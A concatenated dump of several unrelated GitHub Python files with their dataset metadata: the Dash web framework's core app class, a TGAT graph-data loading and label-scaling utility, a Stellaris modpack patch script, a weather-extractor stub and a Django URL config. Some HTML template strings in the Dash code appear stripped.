import exceptions\nfrom ._utils import AttributeDict as _AttributeDict\n\n\n# pylint: disable=too-many-instance-attributes\n# pylint: disable=too-many-arguments\nclass Dash(object):\n def __init__(\n self,\n name='__main__',\n server=None,\n static_folder='static',\n url_base_pathname='/',\n compress=True,\n **kwargs):\n\n # pylint-disable: too-many-instance-attributes\n if 'csrf_protect' in kwargs:\n warnings.warn('''\n `csrf_protect` is no longer used,\n CSRF protection has been removed as it is no longer\n necessary.\n See https://github.com/plotly/dash/issues/141 for details.\n ''', DeprecationWarning)\n\n name = name or 'dash'\n # allow users to supply their own flask server\n self.server = server or Flask(name, static_folder=static_folder)\n\n self.url_base_pathname = url_base_pathname\n self.config = _AttributeDict({\n 'suppress_callback_exceptions': False,\n 'routes_pathname_prefix': url_base_pathname,\n 'requests_pathname_prefix': url_base_pathname\n })\n\n # list of dependencies\n self.callback_map = {}\n\n if compress:\n # gzip\n Compress(self.server)\n\n @self.server.errorhandler(exceptions.PreventUpdate)\n def _handle_error(error):\n \"\"\"Handle a halted callback and return an empty 204 response\"\"\"\n print(error, file=sys.stderr)\n return ('', 204)\n\n # static files from the packages\n self.css = Css()\n self.scripts = Scripts()\n self.registered_paths = {}\n\n # urls\n\n def add_url(name, view_func, methods=('GET',)):\n self.server.add_url_rule(\n name,\n view_func=view_func,\n endpoint=name,\n methods=list(methods)\n )\n\n add_url(\n '{}_dash-layout'.format(self.config['routes_pathname_prefix']),\n self.serve_layout)\n\n add_url(\n '{}_dash-dependencies'.format(\n self.config['routes_pathname_prefix']),\n self.dependencies)\n\n add_url(\n '{}_dash-update-component'.format(\n self.config['routes_pathname_prefix']),\n self.dispatch,\n ['POST'])\n\n add_url((\n '{}_dash-component-suites'\n '/'\n '/').format(\n self.config['routes_pathname_prefix']),\n self.serve_component_suites)\n\n add_url(\n '{}_dash-routes'.format(self.config['routes_pathname_prefix']),\n self.serve_routes)\n\n add_url(\n self.config['routes_pathname_prefix'],\n self.index)\n\n # catch-all for front-end routes\n add_url(\n '{}'.format(self.config['routes_pathname_prefix']),\n self.index)\n\n self.server.before_first_request(self._setup_server)\n\n self._layout = None\n self._cached_layout = None\n self.routes = []\n\n @property\n def layout(self):\n return self._layout\n\n def _layout_value(self):\n if isinstance(self._layout, collections.Callable):\n self._cached_layout = self._layout()\n else:\n self._cached_layout = self._layout\n return self._cached_layout\n\n @layout.setter\n def layout(self, value):\n if (not isinstance(value, Component) and\n not isinstance(value, collections.Callable)):\n raise Exception(\n ''\n 'Layout must be a dash component '\n 'or a function that returns '\n 'a dash component.')\n\n self._layout = value\n\n layout_value = self._layout_value()\n # pylint: disable=protected-access\n self.css._update_layout(layout_value)\n self.scripts._update_layout(layout_value)\n self._collect_and_register_resources(\n self.scripts.get_all_scripts()\n )\n self._collect_and_register_resources(\n self.css.get_all_css()\n )\n\n def serve_layout(self):\n layout = self._layout_value()\n\n # TODO - Set browser cache limit - pass hash into frontend\n return flask.Response(\n json.dumps(layout,\n cls=plotly.utils.PlotlyJSONEncoder),\n mimetype='application/json'\n )\n\n def _config(self):\n return 
{\n 'url_base_pathname': self.url_base_pathname,\n 'requests_pathname_prefix': self.config['requests_pathname_prefix']\n }\n\n def serve_routes(self):\n return flask.Response(\n json.dumps(self.routes,\n cls=plotly.utils.PlotlyJSONEncoder),\n mimetype='application/json'\n )\n\n def _collect_and_register_resources(self, resources):\n # template in the necessary component suite JS bundles\n # add the version number of the package as a query parameter\n # for cache busting\n def _relative_url_path(relative_package_path='', namespace=''):\n\n # track the registered packages\n if namespace in self.registered_paths:\n self.registered_paths[namespace].append(relative_package_path)\n else:\n self.registered_paths[namespace] = [relative_package_path]\n\n return '{}_dash-component-suites/{}/{}?v={}'.format(\n self.config['routes_pathname_prefix'],\n namespace,\n relative_package_path,\n importlib.import_module(namespace).__version__\n )\n\n srcs = []\n for resource in resources:\n if 'relative_package_path' in resource:\n if isinstance(resource['relative_package_path'], str):\n srcs.append(_relative_url_path(**resource))\n else:\n for rel_path in resource['relative_package_path']:\n srcs.append(_relative_url_path(\n relative_package_path=rel_path,\n namespace=resource['namespace']\n ))\n elif 'external_url' in resource:\n if isinstance(resource['external_url'], str):\n srcs.append(resource['external_url'])\n else:\n for url in resource['external_url']:\n srcs.append(url)\n elif 'absolute_path' in resource:\n raise Exception(\n 'Serving files form absolute_path isn\\'t supported yet'\n )\n return srcs\n\n def _generate_css_dist_html(self):\n links = self._collect_and_register_resources(\n self.css.get_all_css()\n )\n return '\\n'.join([\n ''.format(link)\n for link in links\n ])\n\n def _generate_scripts_html(self):\n # Dash renderer has dependencies like React which need to be rendered\n # before every other script. 
However, the dash renderer bundle\n # itself needs to be rendered after all of the component's\n # scripts have rendered.\n # The rest of the scripts can just be loaded after React but before\n # dash renderer.\n # pylint: disable=protected-access\n srcs = self._collect_and_register_resources(\n self.scripts._resources._filter_resources(\n dash_renderer._js_dist_dependencies\n ) +\n self.scripts.get_all_scripts() +\n self.scripts._resources._filter_resources(\n dash_renderer._js_dist\n )\n )\n\n return '\\n'.join([\n ''.format(src)\n for src in srcs\n ])\n\n def _generate_config_html(self):\n return (\n ''\n ).format(json.dumps(self._config()))\n\n # Serve the JS bundles for each package\n def serve_component_suites(self, package_name, path_in_package_dist):\n if package_name not in self.registered_paths:\n raise Exception(\n 'Error loading dependency.\\n'\n '\"{}\" is not a registered library.\\n'\n 'Registered libraries are: {}'\n .format(package_name, list(self.registered_paths.keys())))\n\n elif path_in_package_dist not in self.registered_paths[package_name]:\n raise Exception(\n '\"{}\" is registered but the path requested is not valid.\\n'\n 'The path requested: \"{}\"\\n'\n 'List of registered paths: {}'\n .format(\n package_name,\n path_in_package_dist,\n self.registered_paths\n )\n )\n\n mimetype = ({\n 'js': 'application/JavaScript',\n 'css': 'text/css'\n })[path_in_package_dist.split('.')[-1]]\n return Response(\n pkgutil.get_data(package_name, path_in_package_dist),\n mimetype=mimetype\n )\n\n def index(self, *args, **kwargs): # pylint: disable=unused-argument\n scripts = self._generate_scripts_html()\n css = self._generate_css_dist_html()\n config = self._generate_config_html()\n title = getattr(self, 'title', 'Dash')\n return '''\n \n \n \n \n {}\n {}\n \n \n
<div id=\"react-entry-point\">\n <div class=\"_dash-loading\">\n Loading...\n </div>\n </div>\n <footer>\n {}\n {}\n </footer>
\n \n \n '''.format(title, css, config, scripts)\n\n def dependencies(self):\n return flask.jsonify([\n {\n 'output': {\n 'id': k.split('.')[0],\n 'property': k.split('.')[1]\n },\n 'inputs': v['inputs'],\n 'state': v['state'],\n 'events': v['events']\n } for k, v in list(self.callback_map.items())\n ])\n\n # pylint: disable=unused-argument, no-self-use\n def react(self, *args, **kwargs):\n raise exceptions.DashException(\n 'Yo! `react` is no longer used. \\n'\n 'Use `callback` instead. `callback` has a new syntax too, '\n 'so make sure to call `help(app.callback)` to learn more.')\n\n def _validate_callback(self, output, inputs, state, events):\n # pylint: disable=too-many-branches\n layout = self._cached_layout or self._layout_value()\n\n if (layout is None and\n not self.config.first('suppress_callback_exceptions',\n 'supress_callback_exceptions')):\n # Without a layout, we can't do validation on the IDs and\n # properties of the elements in the callback.\n raise exceptions.LayoutIsNotDefined('''\n Attempting to assign a callback to the application but\n the `layout` property has not been assigned.\n Assign the `layout` property before assigning callbacks.\n Alternatively, suppress this warning by setting\n `app.config['suppress_callback_exceptions']=True`\n '''.replace(' ', ''))\n\n for args, obj, name in [([output], Output, 'Output'),\n (inputs, Input, 'Input'),\n (state, State, 'State'),\n (events, Event, 'Event')]:\n\n if not isinstance(args, list):\n raise exceptions.IncorrectTypeException(\n 'The {} argument `{}` is '\n 'not a list of `dash.dependencies.{}`s.'.format(\n name.lower(), str(args), name\n ))\n\n for arg in args:\n if not isinstance(arg, obj):\n raise exceptions.IncorrectTypeException(\n 'The {} argument `{}` is '\n 'not of type `dash.{}`.'.format(\n name.lower(), str(arg), name\n ))\n\n if (not self.config.first('suppress_callback_exceptions',\n 'supress_callback_exceptions') and\n arg.component_id not in layout and\n arg.component_id != getattr(layout, 'id', None)):\n raise exceptions.NonExistantIdException('''\n Attempting to assign a callback to the\n component with the id \"{}\" but no\n components with id \"{}\" exist in the\n app\\'s layout.\\n\\n\n Here is a list of IDs in layout:\\n{}\\n\\n\n If you are assigning callbacks to components\n that are generated by other callbacks\n (and therefore not in the initial layout), then\n you can suppress this exception by setting\n `app.config['suppress_callback_exceptions']=True`.\n '''.format(\n arg.component_id,\n arg.component_id,\n list(layout.keys()) + (\n [] if not hasattr(layout, 'id') else\n [layout.id]\n )\n ).replace(' ', ''))\n\n if not self.config.first('suppress_callback_exceptions',\n 'supress_callback_exceptions'):\n\n if getattr(layout, 'id', None) == arg.component_id:\n component = layout\n else:\n component = layout[arg.component_id]\n\n if (hasattr(arg, 'component_property') and\n arg.component_property not in\n component.available_properties and not\n any(arg.component_property.startswith(w) for w in\n component.available_wildcard_properties)):\n raise exceptions.NonExistantPropException('''\n Attempting to assign a callback with\n the property \"{}\" but the component\n \"{}\" doesn't have \"{}\" as a property.\\n\n Here is a list of the available properties in \"{}\":\n {}\n '''.format(\n arg.component_property,\n arg.component_id,\n arg.component_property,\n arg.component_id,\n component.available_properties).replace(\n ' ', ''))\n\n if (hasattr(arg, 'component_event') and\n arg.component_event 
not in\n component.available_events):\n raise exceptions.NonExistantEventException('''\n Attempting to assign a callback with\n the event \"{}\" but the component\n \"{}\" doesn't have \"{}\" as an event.\\n\n Here is a list of the available events in \"{}\":\n {}\n '''.format(\n arg.component_event,\n arg.component_id,\n arg.component_event,\n arg.component_id,\n component.available_events).replace(' ', ''))\n\n if state and not events and not inputs:\n raise exceptions.MissingEventsException('''\n This callback has {} `State` {}\n but no `Input` elements or `Event` elements.\\n\n Without `Input` or `Event` elements, this callback\n will never get called.\\n\n (Subscribing to input components will cause the\n callback to be called whenver their values\n change and subscribing to an event will cause the\n callback to be called whenever the event is fired.)\n '''.format(\n len(state),\n 'elements' if len(state) > 1 else 'element'\n ).replace(' ', ''))\n\n if '.' in output.component_id:\n raise exceptions.IDsCantContainPeriods('''The Output element\n `{}` contains a period in its ID.\n Periods are not allowed in IDs right now.'''.format(\n output.component_id\n ))\n\n callback_id = '{}.{}'.format(\n output.component_id, output.component_property)\n if callback_id in self.callback_map:\n raise exceptions.CantHaveMultipleOutputs('''\n You have already assigned a callback to the output\n with ID \"{}\" and property \"{}\". An output can only have\n a single callback function. Try combining your inputs and\n callback functions together into one function.\n '''.format(\n output.component_id,\n output.component_property).replace(' ', ''))\n\n # TODO - Update nomenclature.\n # \"Parents\" and \"Children\" should refer to the DOM tree\n # and not the dependency tree.\n # The dependency tree should use the nomenclature\n # \"observer\" and \"controller\".\n # \"observers\" listen for changes from their \"controllers\". For example,\n # if a graph depends on a dropdown, the graph is the \"observer\" and the\n # dropdown is a \"controller\". 
In this case the graph's \"dependency\" is\n # the dropdown.\n # TODO - Check this map for recursive or other ill-defined non-tree\n # relationships\n # pylint: disable=dangerous-default-value\n def callback(self, output, inputs=[], state=[], events=[]):\n self._validate_callback(output, inputs, state, events)\n\n callback_id = '{}.{}'.format(\n output.component_id, output.component_property\n )\n self.callback_map[callback_id] = {\n 'inputs': [\n {'id': c.component_id, 'property': c.component_property}\n for c in inputs\n ],\n 'state': [\n {'id': c.component_id, 'property': c.component_property}\n for c in state\n ],\n 'events': [\n {'id': c.component_id, 'event': c.component_event}\n for c in events\n ]\n }\n\n def wrap_func(func):\n @wraps(func)\n def add_context(*args, **kwargs):\n\n output_value = func(*args, **kwargs)\n response = {\n 'response': {\n 'props': {\n output.component_property: output_value\n }\n }\n }\n\n return flask.Response(\n json.dumps(response,\n cls=plotly.utils.PlotlyJSONEncoder),\n mimetype='application/json'\n )\n\n self.callback_map[callback_id]['callback'] = add_context\n\n return add_context\n\n return wrap_func\n\n def dispatch(self):\n body = flask.request.get_json()\n inputs = body.get('inputs', [])\n state = body.get('state', [])\n output = body['output']\n\n target_id = '{}.{}'.format(output['id'], output['property'])\n args = []\n for component_registration in self.callback_map[target_id]['inputs']:\n args.append([\n c.get('value', None) for c in inputs if\n c['property'] == component_registration['property'] and\n c['id'] == component_registration['id']\n ][0])\n\n for component_registration in self.callback_map[target_id]['state']:\n args.append([\n c.get('value', None) for c in state if\n c['property'] == component_registration['property'] and\n c['id'] == component_registration['id']\n ][0])\n\n return self.callback_map[target_id]['callback'](*args)\n\n def _setup_server(self):\n self._generate_scripts_html()\n self._generate_css_dist_html()\n\n def run_server(self,\n port=8050,\n debug=False,\n **flask_run_options):\n self.server.run(port=port, debug=debug, **flask_run_options)\n","repo_name":"1pani/fund-rank-dashboard","sub_path":"venv/Lib/site-packages/dash/dash.py","file_name":"dash.py","file_ext":"py","file_size_in_byte":21484,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"26035538395","text":"import random\nimport sys\nimport argparse\n\nimport torch\nimport pandas as pd\nimport numpy as np\n#import numba\nfrom tqdm import tqdm\n\nfrom sklearn.metrics import r2_score\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn import preprocessing\nfrom sklearn.cluster import AgglomerativeClustering, KMeans\n\nclass Data:\n def __init__(self, sources, destinations, dest_categories, timestamps, edge_idxs, raw_labels, labels):\n self.sources = sources\n self.destinations = destinations\n self.dest_categories = dest_categories\n self.timestamps = timestamps\n self.edge_idxs = edge_idxs\n self.raw_labels = raw_labels\n self.labels = labels\n\nclass KBinsScaler:\n def __init__(self, n_bins, strategy=\"agg\"):\n self.n_bins = n_bins\n self.strategy = strategy\n\n def fit(self, X):\n X = X.flatten()\n # if strategy is kmeans, generte bin_edges_ with sklearn kmeans\n if self.strategy == \"kmeans\" or self.strategy == \"agg\":\n # reduce the n_cluster to ensure the first bin is always 0\n n_clusters = self.n_bins - 1\n if self.strategy == \"kmeans\":\n clustering_model = 
KMeans(n_clusters=n_clusters, random_state=0)\n else:\n clustering_model = AgglomerativeClustering(n_clusters=n_clusters, linkage='average')\n clustering_model.fit(X.reshape(-1, 1))\n self.bin_edges_ = np.sort(np.append(clustering_model.cluster_centers_.flatten(), 0))\n else: \n self.bin_edges_ = np.percentile(X, np.linspace(0, 100, self.n_bins - 1))\n return self\n\n def transform(self, X):\n X = X.flatten()\n # Assign each value to a bin\n # if strategy is kmeans, assign X_binned to the closest bin_edges_ \n if self.strategy == \"kmeans\":\n X_binned = np.zeros(len(X), dtype=int)\n for i in range(len(X)):\n X_binned[i] = np.argmin(np.abs(X[i] - self.bin_edges_))\n else:\n X_binned = np.digitize(X, self.bin_edges_, right=True)\n return X_binned\n\n def fit_transform(self, X):\n return self.fit(X).transform(X)\n\n def inverse_transform(self, X):\n return self.bin_edges_[np.clip(np.round(X), 0, len(self.bin_edges_)-1).astype(int)]\n\n def __repr__(self):\n return \"KBinsScaler(n_bins={}, strategy{})\".format(self.n_bins, self.strategy)\n\nclass KBinsDiscretizer(KBinsScaler):\n def transform(self, X):\n X_binned = super().transform(X)\n # Create one-hot encoding\n one_hot = np.zeros((len(X), self.n_bins))\n one_hot[np.arange(len(X)), X_binned] = 1\n return one_hot\n\n def inverse_transform(self, X):\n return self.bin_edges_[np.argmax(X)]\n \n def __repr__(self):\n return \"KBinsDiscretizer(n_bins={}, strategy{})\".format(self.n_bins, self.strategy)\n\ndef get_data(dataset_name, scale_label, device, num_classes=10, classification_mode=False):\n ### Load data and train val test split\n graph_df = pd.read_csv('./processed/ml_{}.csv'.format(dataset_name))\n edge_features = np.load('./processed/ml_{}.npy'.format(dataset_name))\n node_features = np.load('./processed/ml_{}_node.npy'.format(dataset_name)) \n\n val_time, test_time = list(np.quantile(graph_df.ts, [0.70, 0.85]))\n\n ts_l = graph_df.ts.values\n valid_train_flag = (ts_l <= val_time)\n\n\n train_df = graph_df[valid_train_flag]\n train_i = train_df.i.unique()\n # filter out new merchants in the valid/test\n from scipy import stats\n\n graph_df = graph_df[graph_df.i.isin(train_i)]\n\n ts_l = graph_df.ts.values\n valid_train_flag = (ts_l <= val_time)\n src_l = graph_df.u.values\n dst_l = graph_df.i.values\n cat_l = graph_df.cat.values\n e_idx_l = graph_df.idx.values\n # scaling labels\n scaleUtil = ScaleUtil(scale_label, device, num_classes=num_classes, classification_mode=classification_mode)\n label_l, raw_label_l = scaleUtil.transform_df(graph_df, valid_train_flag)\n\n full_data = Data(sources=src_l, \n destinations=dst_l, \n dest_categories=cat_l, \n timestamps=ts_l, \n edge_idxs=e_idx_l, \n raw_labels=raw_label_l, \n labels=label_l)\n\n def get_dataset(flag):\n ds = Data(sources=src_l[flag], \n destinations=dst_l[flag], \n dest_categories=cat_l[flag], \n timestamps=ts_l[flag], \n edge_idxs=e_idx_l[flag], \n raw_labels=raw_label_l[flag], \n labels=label_l[flag])\n return ds\n \n train_data = get_dataset(valid_train_flag)\n # select validation and test dataset\n valid_val_flag = (ts_l <= test_time) * (ts_l > val_time)\n val_data = get_dataset(valid_val_flag)\n\n valid_test_flag = ts_l > test_time\n test_data = get_dataset(valid_test_flag)\n return node_features, edge_features, full_data, train_data, val_data, test_data, scaleUtil\n\n\nclass ScaleUtil:\n def __init__(self, scale_label, device, num_classes, classification_mode):\n self.scale_label = scale_label\n if scale_label == 'MinMax':\n self.sscaler = preprocessing.MinMaxScaler\n elif 
scale_label == 'Quantile':\n self.scaler = preprocessing.QuantileTransformer\n elif scale_label == 'Log':\n self.scaler = preprocessing.StandardScaler\n elif scale_label == 'Cbrt':\n self.scaler = preprocessing.StandardScaler\n elif scale_label.startswith('Discr'):\n self.num_classes = num_classes\n if classification_mode:\n self.scaler = KBinsDiscretizer\n else:\n self.scaler = KBinsScaler\n self.device = device\n self.i2cat = None\n self.scalers_dict = None\n self.classification_mode = classification_mode\n \n def transform_df(self, original_graph_df, valid_train_flag):\n graph_df = original_graph_df.copy()\n graph_df['raw_label'] = graph_df.label.copy()\n \n self.i2cat = graph_df.groupby('i').first().reset_index().set_index('i')['cat'].to_dict()\n # TODO: whether to clip the label?\n for cat in set(self.i2cat.values()):\n orig_labels = graph_df.loc[(graph_df.cat == cat) & valid_train_flag, 'label'].values\n lower = np.quantile(orig_labels, 0.001)\n upper = np.quantile(orig_labels, 0.999)\n graph_df.loc[(graph_df.cat == cat) & valid_train_flag, 'label'] = np.clip(orig_labels, lower, upper)\n \n if self.scale_label == 'none':\n # no need to scale\n return graph_df.label.values, graph_df.label.values\n scaled_label_cols = 'label'\n if self.scale_label == 'Cbrt':\n graph_df.label = np.cbrt(graph_df.label.values)\n else:\n graph_df['label'] = self.prepare_transform(graph_df.label.values)\n if self.classification_mode:\n scaled_label_cols=[f'label_{i}' for i in range(self.num_classes)]\n graph_df[scaled_label_cols] = np.zeros(shape=(graph_df.shape[0],self.num_classes))\n train_df = graph_df[valid_train_flag]\n self.scalers_dict = {}\n if self.scale_label.endswith('#cat'):\n for cat in set(self.i2cat.values()):\n if self.scale_label.startswith('Discr'):\n self.scalers_dict[cat] = self.scaler(n_bins=self.num_classes, strategy=self.scale_label.split('-')[1])\n else:\n self.scalers_dict[cat] = self.scaler()\n train_label_vals = train_df[train_df.cat==cat].label.values\n self.scalers_dict[cat].fit(train_label_vals.reshape(-1, 1))\n label_vals = graph_df.loc[graph_df.cat == cat].label.values \n graph_df.loc[graph_df.cat == cat, scaled_label_cols] = self.scalers_dict[cat].transform(label_vals.reshape(-1, 1))\n else:\n train_label_vals = train_df.label.values\n if self.scale_label.startswith('Discr'):\n self.scalers_dict['#all'] = self.scaler(n_bins=self.num_classes, strategy=self.scale_label.split('-')[1])\n else:\n self.scalers_dict['#all'] = self.scaler()\n self.scalers_dict['#all'].fit(train_label_vals.reshape(-1, 1))\n label_vals = graph_df.label.values \n graph_df[scaled_label_cols] = self.scalers_dict['#all'].transform(label_vals.reshape(-1, 1))\n return graph_df[scaled_label_cols].values, graph_df.raw_label.values\n \n def prepare_transform(self, label_vals):\n if self.scale_label == 'Log':\n label_vals = np.sign(label_vals) * np.log(np.abs(label_vals)+1)\n elif self.scale_label == 'Cbrt':\n label_vals = np.cbrt(label_vals)\n return label_vals\n\n def convert_to_raw_label_scale(self, dst_l_cut, preds):\n raw_preds = []\n for dst, pred in zip(dst_l_cut, preds):\n if self.scale_label == 'Cbrt':\n raw = np.power(pred, 3)\n raw_preds.append(raw)\n else:\n if (self.i2cat is None) or (self.scalers_dict is None):\n raise RuntimeError(\"self.i2cat or self.scalers_dict is None. 
Run ScaleUtil.transform_df function first\")\n if self.scale_label.endswith('#cat'):\n \n cat = self.i2cat[dst]\n else:\n cat = '#all'\n raw = self.scalers_dict[cat].inverse_transform(pred.reshape(1, -1))\n if self.scale_label == 'Log':\n raw = np.sign(raw) * (np.exp(np.abs(raw))-1)\n elif self.scale_label == 'Cbrt':\n raw = np.power(raw, 3)\n if len(raw.shape) > 1:\n raw = raw.item()\n raw_preds.append(raw)\n if isinstance(preds, np.ndarray):\n return np.array(raw_preds)\n else:\n return torch.tensor(raw_preds, dtype=float, device=self.device)","repo_name":"ConsGene/TGAT","sub_path":"data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":10051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72426209865","text":"# This utility examines all the files in the ! Modpack folder (or in the folder specified by the -mod command line argument).\n# The files are compared to the files in the extracted mod folders that would be put into the modpack folder according to the whitelist.txt file.\n# Any files in the modpack folder that differ from the expected file are copied into the mod\\ModpackPatch folder.\n\n# What is the point of all this?\n\n# After merging mods into a modpack, a user may want to replace one of the conflicting files with a file from a different mod,\n# or perhaps even make manual modifications to the files in the modpack.\n# Running this script to create a modpack patch is a way to sort of \"save\" the changes made to a modpack.\n\n# The various mods in the modpack can then be updated via the standard workflow when new releases of any of the mods come out,\n# after which a user can compare changed files in the mod with their custom changes in the patch through whatever diff method the user prefers.\n\n# The modpackPatch is not intended to be added to your active mods in the stellaris launcher (it will add nothing the modpack doesn't already add)\n# it's just a tool to help customize modpacks, save modified files, and save the way you've resolved conflicts,\n# and then easily re-impliment or diff the changes you've made when new versions of the mods come out or when you add new mods to the modpack.\n\nimport os\nimport glob\nfrom os.path import isfile\n\nfrom shutil import copy2\nfrom filecmp import cmp as compare\nfrom argparse import ArgumentParser\n\n\ndef mod_patch(modpack_name, add_to_whitelist=True, check_only=False):\n changes_present = False\n changeSet = set()\n patch_name = modpack_name + \"Patch\"\n print(f\"\\nChecking for customizations in {modpack_name}...\\n\")\n fileSet = {\"duplicateFilesList.txt\", \"allFilesList.txt\", \"whitelist.txt\"} # To avoid copying these meta lists to the patch folder.\n patch_created = False\n # Keep only the alphanumeric characters in the names in the whitelist, remove blank lines:\n fileList = glob.glob('mod\\\\! 
Modpack Baseline\\\\**', recursive=True)\n for cur_file in fileList:\n if not os.path.isfile(cur_file) or \".mod\" in cur_file:\n continue # Skip directory the folders themselves and mod descriptor files.\n file_path = cur_file.split(os.sep)\n file_path[0] = \"mod\" # Change folder to the modpack.\n file_path[1] = modpack_name # Change folder to the modpack.\n path_within_mod = os.sep.join(file_path[2:])\n if path_within_mod in fileSet:\n # A file with this path has already been compared.\n # The cur_file might be a conflict or maybe a duplicate.\n # Either way, no checking is necessary, so go to the next file.\n continue\n try:\n if not isfile(os.sep.join(file_path)):\n with open(os.sep.join(file_path),\"w+\") as f:\n f.write(\"#Overriden\")\n #print(cur_file)\n #print(file_path)\n if compare(cur_file, os.sep.join(file_path)):\n # The first mod on the whitelist that has this file has an identical file to the file in the modpack.\n # This means no customization has been made, and nothing need be done.\n fileSet.add(path_within_mod)\n else:\n # This file has been altered.\n if check_only:\n changes_present = True\n if path_within_mod not in changeSet:\n print(f\"File in modpack differs from file in mod: {os.sep.join(cur_file.split(os.sep)[1:])}\")\n changeSet.add(path_within_mod)\n continue # Advance to next file without any copying.\n # Copy the file to the patch folder.\n print(f\"Adding customized file to patch: {path_within_mod}\")\n patch_created = True\n fileSet.add(path_within_mod)\n modified_file = os.sep.join(file_path)\n file_path[1] = patch_name # Change folder to the patch.\n target_path = os.sep.join(file_path)\n target_dir = os.path.dirname(target_path)\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n copy2(modified_file, target_path)\n except Exception as e:\n print(cur_file)\n print(e)\n print(f\"Adding customized file to patch: {path_within_mod}\")\n patch_created = True\n fileSet.add(path_within_mod)\n modified_file = os.sep.join(file_path)\n file_path[1] = patch_name # Change folder to the patch.\n target_path = os.sep.join(file_path)\n target_dir = os.path.dirname(target_path)\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n copy2(modified_file, target_path)\n\n # Check the modpack for unique files that are not present in any of the mods on the whitelist.\n all_mod_files = glob.glob(f'mod{os.sep}{modpack_name}{os.sep}**', recursive=True)\n for cur_file in all_mod_files:\n if not os.path.isfile(cur_file) or \".mod\" in cur_file:\n continue # Skip directory the folders themselves and mod descriptor files.\n file_path = cur_file.split(os.sep)\n path_within_mod = os.sep.join(file_path[2:])\n if path_within_mod not in fileSet:\n # Even after looking through all of the mods, we've never seen this file. 
It must be new.\n if check_only:\n changes_present = True\n if path_within_mod not in changeSet:\n print(f\"File has been added to modpack: {path_within_mod}\")\n changeSet.add(path_within_mod)\n continue # Advance to next file without any copying.\n # Copy the new file to the patch.\n print(f\"Adding unique file to patch: {path_within_mod}\")\n patch_created = True\n file_path = cur_file.split(os.sep)\n file_path[1] = patch_name\n target_path = os.sep.join(file_path)\n target_dir = os.path.dirname(target_path)\n if not os.path.exists(target_dir):\n os.makedirs(target_dir)\n copy2(cur_file, target_path)\n\n if check_only:\n if changes_present:\n return True\n return False # Done checking for new changes - there were none!\n\n if patch_created:\n if not os.path.isfile(f\"mod{os.sep}{patch_name}.mod\"):\n with open(f\"mod{os.sep}{patch_name}.mod\", \"w+\") as f:\n f.writelines([f\"name=\\\"{patch_name}\\\"\\n\", f\"path=\\\"mod{os.sep}{patch_name}\\\"\\n\", \"tags={\\n\", \"\\t\\\"Gameplay\\\"\\n\", \"}\\n\", \"supported_version=\\\"3.*.*\\\"\\n\"])\n print(f\"\\n\\nCustomized files in \\\"{modpack_name}\\\" have been copied to \\\"{patch_name}\\\".{' The patch has been added to your whitelist.' if add_to_whitelist else ''}\\n\")\n else:\n print(f\"\\n\\nNo customized files found in \\\"{modpack_name}\\\". No patch created.\\n\")\n\n # Return a bool indicating that a patch has indeed been created.\n return patch_created\n\n\ndef get_name_from_cl():\n parser = ArgumentParser()\n parser.add_argument('-n', '--modpack_name', default=\"! modpack\", type=str,\n help='The name of the modpack (both the folder name and the name in the stellaris launcher).')\n args = parser.parse_args()\n return args.modpack_name\n\n\nif __name__ == \"__main__\":\n modpack_name = get_name_from_cl()\n mod_patch(modpack_name)\n","repo_name":"D4rkstalker/StellarisModpackUtility","sub_path":"make_mod_patch.py","file_name":"make_mod_patch.py","file_ext":"py","file_size_in_byte":7561,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"70524633865","text":"import requests\n\nfrom extract.extractor import Extractor\n\n_FORECAST_URL = 'http://ES_search_demo.com/document/record/_search?pretty=true'\n_CITIES = {\n 'San Francisco': {'id': 5391959, 'name': 'San Francisco', 'country': 'US',\n 'coord': {'lon': -122.419418, 'lat': 37.774929}},\n 'Vancouver': {'id': 6173331, 'name': 'Vancouver', 'country': 'CA', 'coord': {'lon': -123.119339, 'lat': 49.24966}},\n 'Toronto': {'id': 6167865, 'name': 'Toronto', 'country': 'CA', 'coord': {'lon': -79.416298, 'lat': 43.700111}},\n 'Edmonton': {'id': 5946768, 'name': 'Edmonton', 'country': 'CA', 'coord': {'lon': -113.468712, 'lat': 53.55014}},\n 'New York': {'id': 5128581, 'name': 'New York', 'country': 'US', 'coord': {'lon': -74.005966, 'lat': 40.714272}},\n 'Sao Paulo': {'id': 3448439, 'name': 'Sao Paulo', 'country': 'BR', 'coord': {'lon': -46.636108, 'lat': -23.547501}},\n 'Tokyo': {'id': 1850147, 'name': 'Tokyo', 'country': 'JP', 'coord': {'lon': 139.691711, 'lat': 35.689499}},\n 'Hsinchu': {'id': 1675151, 'name': 'Hsinchu', 'country': 'TW', 'coord': {'lon': 120.968613, 'lat': 24.80361}},\n 'Melbourne': {'id': 2158177, 'name': 'Melbourne', 'country': 'AU', 'coord': {'lon': 144.963318, 'lat': -37.813999}},\n}\n\n\nclass OpenWeatherExtractor(Extractor):\n def __init__(self):\n super().__init__()\n pass\n\n def get_weather(self):\n pass\n\n def get_forecast(self):\n data = '''{\n \"query\": {\n \"bool\": {\n \"must\": [\n {\n 
\"text\": {\n \"record.document\": \"SOME_JOURNAL\"\n }\n },\n {\n \"text\": {\n \"record.articleTitle\": \"farmers\"\n }\n }\n ],\n \"must_not\": [],\n \"should\": []\n }\n },\n \"from\": 0,\n \"size\": 50,\n \"sort\": [],\n \"facets\": {}\n }'''\n response = requests.post(_FORECAST_URL, data=data)\n","repo_name":"andrewkho/ororo-etl","sub_path":"extract/open_weather.py","file_name":"open_weather.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3297810282","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.main, name=\"learning\"),\n path('validate', views.validate, name=\"validate\"),\n path('detail', views.detail, name=\"learning-detail\"),\n path('model_save', views.save_model_list, name=\"model-save\"),\n path('learning', views.learning_models, name=\"learning-models\"),\n]","repo_name":"KHM13/wave_ml_nurier","sub_path":"wave_ml/apps/learning/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2835114233","text":"#!/usr/bin/python\n# *-* coding: 